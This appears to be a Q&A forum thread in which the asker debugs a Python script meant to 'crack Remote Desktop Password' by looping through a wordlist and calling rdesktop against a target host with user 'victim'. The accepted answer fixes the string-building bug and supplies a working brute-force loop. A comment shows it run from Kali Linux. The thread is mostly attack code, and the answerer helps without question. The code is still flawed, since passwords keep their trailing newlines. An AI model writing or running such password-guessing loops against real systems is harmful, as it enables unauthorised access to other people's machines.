# Argument 1 must be string, not tuple

Tags: python

I'm trying to crack Remote Desktop Password with python. I get one error in my script output.

```
import os


host = "10.10.10.8"
user = "victim"
passw = "wordlist.txt"

password=open(passw,"r")


for passwords in password.readlines():
    print("Testing passwords: ",passwords)
    command = "rdesktop -u ", user , " -p " , passwords , host
    connect = os.system(command)
```

[Error output image](https://i.stack.imgur.com/sDuFT.png)

Answer (score 0, accepted):

Your command variable is producing a tuple. Try rewriting this way:

```
import os


host = "10.10.10.8"
user = "victim"
passw = "wordlist.txt"

password=open(passw,"r")


for passwords in password.readlines():
    print("Testing passwords: ",passwords)
    command = "rdesktop -u " + user + " -p " + passwords + " " + host
    connect = os.system(command)
```

Comment: Thanks for your help script is now ok, but another error has occur I'm running script not connect rdesktop and show rdesktop options. "root@kali:~/Desktop# python rdpp.py 
('Testing passwords: ', 'victim@123\r\n')
rdesktop: A Remote Desktop Protocol client.
Version 1.9.0. Copyright (C) 1999-2016 Matthew Chapman et al.

Usage: rdesktop [options] server[:port]
   -u: user name
   -d: domain
   -s: shell / seamless application to start remotely
   -c: working directory
" like this.